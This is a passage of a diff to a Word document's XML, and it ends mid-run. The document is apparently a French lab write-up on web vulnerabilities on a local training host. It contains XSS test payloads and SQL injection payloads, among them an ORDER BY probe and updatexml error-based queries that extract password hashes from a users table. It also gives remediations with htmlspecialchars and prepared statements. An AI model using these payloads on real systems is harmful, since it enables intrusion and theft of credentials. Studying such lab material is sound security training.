       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -1994,6 +2339,7 @@
         </w:rPr>
         <w:t>d</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -2114,7 +2460,25 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>&lt;script&gt;alert('XSS')&lt;/script&gt;</w:t>
+        <w:t>&lt;script&gt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>alert</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>('XSS')&lt;/script&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2272,6 +2636,7 @@
         </w:rPr>
         <w:t>-</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -2279,8 +2644,9 @@
           <w:bCs/>
           <w:highlight w:val="yellow"/>
         </w:rPr>
-        <w:t>Reflected (Media</w:t>
-      </w:r>
+        <w:t>Reflected</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -2288,6 +2654,15 @@
           <w:bCs/>
           <w:highlight w:val="yellow"/>
         </w:rPr>
+        <w:t xml:space="preserve"> (Media</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
         <w:t>)</w:t>
       </w:r>
     </w:p>
@@ -2344,7 +2719,27 @@
           <w:bCs/>
           <w:color w:val="0070C0"/>
         </w:rPr>
-        <w:t>&lt;script&gt;alert('XSS')&lt;/script&gt;</w:t>
+        <w:t>&lt;script&gt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="0070C0"/>
+        </w:rPr>
+        <w:t>alert</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="0070C0"/>
+        </w:rPr>
+        <w:t>('XSS')&lt;/script&gt;</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2563,7 +2958,47 @@
           <w:bCs/>
           <w:u w:val="single"/>
         </w:rPr>
-        <w:t>Protection contre les failles XSS (Reflected &amp; Stored)</w:t>
+        <w:t>Protection contre les failles XSS (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>Reflected</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> &amp; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>Stored</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2596,7 +3031,35 @@
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
         </w:rPr>
-        <w:t>Nettoyage des données (Output Escaping) : La fonction htmlspecialchars() est la méthode la plus efficace en PHP. Elle transforme les caractères spéciaux (comme &lt; et &gt;) en entités HTML inoffensives. Ainsi, le navigateur affiche le script sous forme de texte brut au lieu de l'exécuter.</w:t>
+        <w:t xml:space="preserve">Nettoyage des données (Output </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>Escaping</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) : La fonction </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>htmlspecialchars</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>() est la méthode la plus efficace en PHP. Elle transforme les caractères spéciaux (comme &lt; et &gt;) en entités HTML inoffensives. Ainsi, le navigateur affiche le script sous forme de texte brut au lieu de l'exécuter.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2619,23 +3082,83 @@
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
         </w:rPr>
-        <w:t>Exemple : Le serveur transforme &lt;script&gt; en &amp;lt;script&amp;gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        </w:rPr>
-      </w:pPr>
+        <w:t>Exemple : Le serveur transforme &lt;script&gt; en &amp;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>lt;script&amp;gt</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:color w:val="92D050"/>
           <w:highlight w:val="black"/>
         </w:rPr>
-        <w:t>echo htmlspecialchars($user_input, ENT_QUOTES, 'UTF-8');</w:t>
+        <w:t>echo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>htmlspecialchars</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>($</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>user_input</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>, ENT_QUOTES, 'UTF-8');</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2802,7 +3325,39 @@
             <w:rStyle w:val="Lienhypertexte"/>
             <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           </w:rPr>
-          <w:t>http://192.168.10.22/?page=searchimg&amp;id=1+ORDER+BY+2--&amp;Submit=Submit#</w:t>
+          <w:t>http://192.168.10.22/?page=searchimg&amp;id=1+ORDER+BY+2--&amp;</w:t>
+        </w:r>
+        <w:proofErr w:type="spellStart"/>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Lienhypertexte"/>
+            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          </w:rPr>
+          <w:t>Submit</w:t>
+        </w:r>
+        <w:proofErr w:type="spellEnd"/>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Lienhypertexte"/>
+            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          </w:rPr>
+          <w:t>=</w:t>
+        </w:r>
+        <w:proofErr w:type="spellStart"/>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Lienhypertexte"/>
+            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          </w:rPr>
+          <w:t>Submit</w:t>
+        </w:r>
+        <w:proofErr w:type="spellEnd"/>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Lienhypertexte"/>
+            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          </w:rPr>
+          <w:t>#</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -3114,6 +3669,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> donne </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -3122,6 +3678,7 @@
         </w:rPr>
         <w:t>albatroz</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3179,13 +3736,41 @@
           <w:color w:val="92D050"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:color w:val="92D050"/>
           <w:highlight w:val="black"/>
         </w:rPr>
-        <w:t>echo -n "albatroz" | sha256sum</w:t>
+        <w:t>echo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -n "</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>albatroz</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>" | sha256sum</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3280,6 +3865,7 @@
         </w:rPr>
         <w:t>-</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -3289,6 +3875,7 @@
         </w:rPr>
         <w:t>Based</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -3396,7 +3983,35 @@
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
         </w:rPr>
-        <w:t>5 AND updatexml(1,concat(0x7e,(SELECT Commentaire FROM users LIMIT 3,1),0x7e),1)</w:t>
+        <w:t xml:space="preserve">5 AND </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>updatexml</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t xml:space="preserve">(1,concat(0x7e,(SELECT Commentaire FROM </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>users</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> LIMIT 3,1),0x7e),1)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3464,7 +4079,49 @@
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
         </w:rPr>
-        <w:t>5 AND updatexml(1,concat(0x7e,(SELECT countersign FROM users LIMIT 3,1),0x7e),1)</w:t>
+        <w:t xml:space="preserve">5 AND </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>updatexml</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t xml:space="preserve">(1,concat(0x7e,(SELECT </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>countersign</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> FROM </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>users</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> LIMIT 3,1),0x7e),1)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3526,21 +4183,77 @@
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
         </w:rPr>
-        <w:t>Cela ne nous renvoit qu’une partie du hash donc pour avoir l’autre partie :</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        </w:rPr>
-        <w:t>5 AND updatexml(1,concat(0x7e,(SELECT SUBSTRING(countersign, 20, 40) FROM users LIMIT 3,1),0x7e),1)</w:t>
+        <w:t xml:space="preserve">Cela ne nous </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>renvoit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> qu’une partie du hash donc pour avoir l’autre partie :</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t xml:space="preserve">5 AND </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>updatexml</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>(1,concat(0x7e,(SELECT SUBSTRING(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>countersign</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, 20, 40) FROM </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>users</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> LIMIT 3,1),0x7e),1)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3610,6 +4323,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> cela donne </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -3618,6 +4332,7 @@
         </w:rPr>
         <w:t>FortyTwo</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3678,7 +4393,35 @@
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
         </w:rPr>
-        <w:t>On met donc FortyTwo en fortytwo :</w:t>
+        <w:t xml:space="preserve">On met donc </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>FortyTwo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> en </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>fortytwo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t> :</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3869,7 +4612,27 @@
           <w:bCs/>
           <w:u w:val="single"/>
         </w:rPr>
-        <w:t>Protection contre les Injections SQL (Union &amp; Error-based)</w:t>
+        <w:t xml:space="preserve">Protection contre les Injections SQL (Union &amp; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>Error-based</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3904,7 +4667,43 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>Requêtes Préparées (Prepared Statements) :</w:t>
+        <w:t>Requêtes Préparées (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Prepared</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Statements</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>) :</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3957,54 +4756,1032 @@
           <w:color w:val="FFFFFF" w:themeColor="background1"/>
           <w:highlight w:val="black"/>
         </w:rPr>
-        <w:t>$stmt = $pdo-&gt;prepare("SELECT username, email FROM users WHERE id = ?");</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:t>$</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:color w:val="FFFFFF" w:themeColor="background1"/>
           <w:highlight w:val="black"/>
         </w:rPr>
-      </w:pPr>
+        <w:t>stmt</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:color w:val="FFFFFF" w:themeColor="background1"/>
           <w:highlight w:val="black"/>
         </w:rPr>
-        <w:t>$stmt-&gt;execute([$_GET['id']]);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="FFFFFF" w:themeColor="background1"/>
-        </w:rPr>
-      </w:pPr>
+        <w:t xml:space="preserve"> = $</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:color w:val="FFFFFF" w:themeColor="background1"/>
           <w:highlight w:val="black"/>
         </w:rPr>
-        <w:t>$user = $stmt-&gt;fetch();</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        </w:rPr>
-      </w:pPr>
+        <w:t>pdo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>-&gt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>prepare</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve">("SELECT </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>username</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, email FROM </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>users</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> WHERE id = ?");</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>$</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>stmt</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
